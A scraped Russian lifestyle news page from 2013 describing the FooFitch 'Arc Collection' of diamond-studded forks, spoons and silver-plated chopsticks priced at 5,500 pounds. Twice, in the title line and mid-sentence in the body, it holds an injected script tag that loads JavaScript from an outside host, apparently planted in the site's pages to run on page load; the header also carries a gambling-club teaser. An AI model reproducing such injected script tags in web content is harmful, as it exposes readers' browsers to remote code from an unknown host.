USD 57.5706    CNY 86.8531    EUR 67.9333    JPY 51.1035
Москва C
Последние новости
05 мар 2017, 19:17
Устали от поисков азартного клуба? Хочется погрузиться в мир настоящего драйва...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Бриллиантовые столовые приборы от FooFitch для королевской трапезы

Бриллиантовые столовые приборы от FooFitch для королевской трапезы

22 сен 2013, 08:57    odenisova
0 комментариев    5 297 просмотров

Бриллиантовые столовые приборы от FooFitch <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для королевской трапезы

Привычка к роскоши - уже вторая натура. У таких людей любая трапеза должна быть обставлена по-королевски, подтверждая старинное русское выражение «на золоте есть». Именно для этого и предназначается коллекция драгоценных столовых приборов от знаменитого Лондонского ювелирного бренда FooFitch под названием «The Arc Collection».

Дизайнеры предполагают, что владельцы будут пользоваться этими предметами каждый день.

 

Люксовая коллекция FooFitch включает в себя набор классических японских палочек, которые особенно будут по душе любителям кулинарных изысков Страны Восходящего солнца. Разумеется, гурманам не обойтись без вилок и ложек. Их изготовили в стиле, традиционном в эпоху строгой и изысканной Викторианской Англии.

 

Бриллиантовые столовые приборы от FooFitch <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для королевской трапезыВ каждом наборе можно обнаружить две посеребренные палочки для ужина в стиле японского ресторана и комплект с вилками и ложками, на которых красуются по 9 бриллиантов.

 

Стоимость ослепительно блестящего бриллиантового набора столовых предметов - 5,5 тыс. фунтов стерлингов ($8560). Ими уже вовсю торгуют магазины и бутики Лондона, такие, как Gary Rhodes 24, Wyndham Grand, Nicholas James, Harrods.

Читайте также
13 фев 2014, 08:57    0 комментариев
С недавнего времени длительные авиаперелеты компании British Airways сопровождаются модными показами с представлением актуальных...
Комментарии